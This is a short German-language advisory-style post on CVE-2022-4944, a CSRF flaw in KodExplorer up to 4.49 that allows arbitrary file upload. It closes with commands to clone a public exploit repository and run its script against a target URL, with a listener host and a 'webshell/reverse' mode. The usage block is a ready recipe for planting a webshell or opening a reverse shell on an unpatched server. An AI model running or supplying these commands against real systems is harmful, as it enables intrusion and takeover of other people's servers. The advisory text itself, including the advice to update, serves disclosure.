
「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF zu beliebigem Datei-Upload

Eine Schwachstelle, die als problematisch eingestuft wurde, wurde in kalcaddle KodExplorer bis Version 4.49 gefunden. Dies betrifft einen unbekannten Teil. Die Manipulation führt zu Cross-Site-Request-Forgery. Diese Schwachstelle ist eindeutig als CVE-2022-4944 identifiziert. Es ist möglich, den Angriff remote zu initiieren. Darüber hinaus ist ein Exploit verfügbar. Es wird empfohlen, die betroffene Komponente zu aktualisieren.

pip install requests
git clone https://github.com/Brosck/CVE-2022-4944.git
cd CVE-2022-4944
python3 CVE-2022-4944.py -u http://TARGET.TLD/KODExplorer -lh LOCALHOST -m MODE # webshell/reverse mode